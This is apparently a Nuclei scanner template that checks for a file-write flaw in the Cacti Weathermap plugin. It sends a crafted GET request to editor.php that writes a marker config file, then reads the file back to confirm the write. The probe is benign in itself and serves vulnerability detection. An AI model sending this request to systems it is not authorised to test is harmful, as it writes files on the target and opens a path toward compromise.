id: cacti-weathermap-file-write
info:
  name: Cacti Weathermap File Write
  author: pikpikcu
  severity: medium
  reference: https://www.freebuf.com/articles/system/125177.html
  tags: injection,cacti
requests:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"
  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/configs/poc.conf"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
        part: body
      - type: status
        status:
          - 200
